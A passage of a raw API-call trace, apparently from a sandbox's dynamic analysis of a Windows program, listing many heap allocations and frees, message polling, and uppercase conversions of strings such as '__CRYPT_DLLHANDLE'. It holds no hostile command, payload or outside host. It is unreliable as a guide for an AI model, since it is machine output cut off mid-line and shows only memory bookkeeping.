hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0089.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0089.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0089.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.569] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0089.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0089.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0089.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0089.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0089.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0089.569] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0089.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0089.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0089.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0089.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0089.569] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.569] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0089.569] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0089.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0089.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0089.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0089.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0089.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0089.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0089.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0089.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0089.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0089.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0089.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0089.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0089.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0089.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0089.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0089.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0089.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0089.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.572] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0089.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0089.572] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0089.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0089.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca460 [0089.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0089.572] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0089.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0089.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0089.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0089.572] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0089.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0089.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0089.572] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0089.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0089.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0089.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0089.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0089.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0089.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0089.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0089.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0089.573] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0089.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0089.573] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0089.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0089.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0089.573] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0089.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0089.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0089.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0089.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0089.573] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0089.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0089.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0089.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0089.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.574] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0089.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0089.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.574] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0089.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0089.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0089.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0089.574] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0089.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0089.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0089.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0089.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0089.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.574] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0089.574] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0089.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0089.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0089.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0089.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0089.575] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0089.575] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0089.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0089.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0089.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0089.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0089.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0089.575] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0089.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0089.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0089.575] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0089.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0089.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0089.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0089.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0089.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0089.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0089.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0089.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0089.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0089.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0089.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0089.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0089.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0089.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0089.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0089.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0089.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0089.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0089.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0089.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0089.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0089.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0089.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0089.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0089.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0089.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0089.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0089.578] 